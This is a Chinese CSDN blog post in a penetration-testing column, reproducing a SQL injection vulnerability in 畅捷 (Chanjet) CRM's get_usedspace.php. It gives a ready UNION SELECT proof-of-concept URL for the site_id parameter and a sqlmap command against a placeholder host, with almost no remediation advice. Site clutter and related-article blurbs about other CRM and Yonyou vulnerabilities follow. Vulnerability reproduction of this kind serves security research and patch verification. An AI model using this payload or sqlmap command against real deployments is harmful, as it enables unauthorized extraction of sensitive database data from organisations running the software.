实战 - 畅捷CRM get_usedspace.php SQL注入漏洞

最新推荐文章于 2024-07-01 11:24:18 发布

渗透测试小白

最新推荐文章于 2024-07-01 11:24:18 发布

阅读量308

点赞数 2

分类专栏：渗透测试实战教学文章标签： php sql 开发语言

本文链接：https://blog.csdn.net/weixin_44971640/article/details/130362004

版权

渗透测试实战教学专栏收录该内容

5 篇文章 4 订阅

订阅专栏

畅捷CRM get_usedspace.php SQL注入漏洞

漏洞描述

畅捷CRM get_usedspace.php存在SQL漏洞，通过漏洞可获取数据库敏感信息

漏洞影响

畅捷CRM

漏洞复现

登录页面

发现使用admin/空密码无法登录成功

验证POC

/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--

使用Sqlmap验证漏洞

sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

渗透测试小白

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
实战 - 畅捷CRM get_usedspace.php SQL注入漏洞

畅捷CRM get_usedspace.php存在SQL漏洞，通过漏洞可获取数据库敏感信息。
复制链接

扫一扫

专栏目录

渗透系列（实战）：YApi 接口管理平台后台任意命令执行漏洞、蓝海卓越计费管理系统 debug.php 远程命令执行漏洞、畅捷CRM 后台附件任意文件上传漏洞和get_usedspace.php

weixin_54626591的博客

12-07

993

YApi 接口管理平台后台任意命令执行漏洞、蓝海卓越计费管理系统 debug.php 远程命令执行漏洞、畅捷CRM 后台附件任意文件上传漏洞和get_usedspace.php SQL注入漏洞

用友畅捷CRM存在SQL注入漏洞

nnn2188185的博客

04-21

547

畅捷CRM系统存在SQL注入漏洞，攻击者可以利用该漏洞获得网站后台数据库信息，构成信息泄露风险。

1 条评论您还未登录，请先登录后发表或查看评论

畅捷CRM 存在SQL注入+后台文件上传漏洞

qq_58091216的博客

12-07

1137

畅捷CRM是面向小企业全力打造的简单、实用的客户关系管理应用!畅捷CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入和后台文件上传漏洞，攻击者可以通过上传木马执行任意命令，获取服务器管理权限。

【漏洞复现】用友畅捷CRM存在SQL注入漏洞

做自己喜欢的事，并将其发挥到极致！

05-06

1072

用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业，以客户为中心，以客户营销为目的，帮助他们 " 提升营销能力，网罗天下商机"。用友畅捷CRM存在SQL注入漏洞，攻击者可通过使用工具获取数据库相关敏感信息，拿到服务器控制权限。

畅捷通CRM SQL注入漏洞复现

0xSec

06-13

1594

用友畅捷CRMcreate_site.php处存在SQL时间盲注，攻击者可以利用该漏洞获取网站后台数据库敏感信息，进一步利用可接管服务器权限。

用友U8 CRM系统help2 任意文件读取漏洞（1day)

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

12-20

596

U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体，提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度，以“整合、专业、智能、畅捷”为产品研发理念，弥补了代理销售服务行业信息化管理的空白，为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构，支持 SQL Server数据库，支持Chrome、 Firefox等各种主流浏览器应用。

漏洞复现-用友UFIDA-YongYou系列

aming小老弟

10-03

1553

UFIDA是中国的一家知名企业软件公司，全称为用友软件股份有限公司（Yonyou Software Co . , Ltd . ）。该公司成立于 1988 年，总部位于北京，是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案，包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业，如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程，并提供数据分析和决策支持工具。

畅捷CRM亮点及操作说明.pptx

09-21

【畅捷CRM】是一款专为小企业设计的智能客户关系管理系统，旨在提升企业的销售业绩和团队协作效率。这款系统包含了线索管理、客户管理、商机跟踪、报价、订单、收款、服务、销售分析等多个核心功能，同时也提供了...

畅捷CRM115产品介绍--XXXX07.pptx

09-21

【畅捷CRM115产品介绍】是一款专为小企业设计的智能化客户关系管理系统，旨在提升销售业绩，解决企业管理中的诸多挑战。这款产品由畅捷通信息技术股份有限公司于2012年7月推出，主要关注协同销售和内部效率的提升。 ...

畅捷服务联盟精品课程-进销存特殊业务处理.pptx

06-29

畅捷服务联盟精品课程-进销存特殊业务处理.pptx

火车头采集器Discuz采集发布模块插件

ccchen888的博客

06-26

604

Discuz论坛采集发布插件下载及使用教程说明，解决discuz门户文章，论坛帖子批量发布问题。

Spring Boot + MinIO 实现文件切片极速上传技术

Admans的专栏

06-29

798

文件切片上传是指将大文件分割成小的片段，然后通过多个请求并行上传这些片段，最终在服务器端将这些片段合并还原为完整的文件。这种方式有助于规避一些上传过程中的问题，如网络不稳定、上传中断等，并能提高上传速度。通过本文，我们深入了解了如何使用Spring Boot和MinIO实现文件切片上传技术。通过文件切片上传，我们能够提高文件上传的速度，优化用户体验。在实际应用中，我们可以根据需求进行性能优化和功能拓展，使得文件上传系统更加强大和可靠。

LAMP架构的源码编译环境下部署Discuz论坛

EsDeath_99的博客

06-26

1103

LAMP架构是一种常见的用于构建动态网站的技术栈。

Web渗透：文件包含漏洞

WolvenSec的博客

06-28

858

默认情况下，该选项是禁用的，以防止远程文件包含（RFI）漏洞。此时我们尝试将url中的文件路径改为hosts文件的绝对路径查看效果：可以看到与本地文件包含不同的是，这个时候我们使用绝对路径，文件的内同也可以被正常包含。如果magic_quotes_gpc是开启的则攻击无法成功，因为我们指定的带有木马的txt文件的url中带有反斜杠（被转义后的反斜杠就会被当成一个字符看待）。检查完成后，造成文件包含的关键代码：与本地文件包含的相关代码并无区别，都是接收客户端传来的文件路径（url）并进行包含。

收银系统源码推荐-千呼新零售

qianhuruanjian的博客

06-27

191

后合管理网站: HTML5+vue2.0+element-ui+css+js。线下收银台（安卓/PC收银、安卓自助收银）: Dart3。核心开发语言: PHP、HTML5、Dart。系统框架：Flutter 3.19.6。移动小助手: uniapp。后台接口: PHP7.3。线上商城: uniapp。

玩个游戏找以下2个wordpress外贸主题的不同你几找到几处

xiaoyuya

06-26

214

2个看上去差不多实际很不一样的wordpress外贸主题重点藏在细节里

使用PHP实现Web爬虫

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交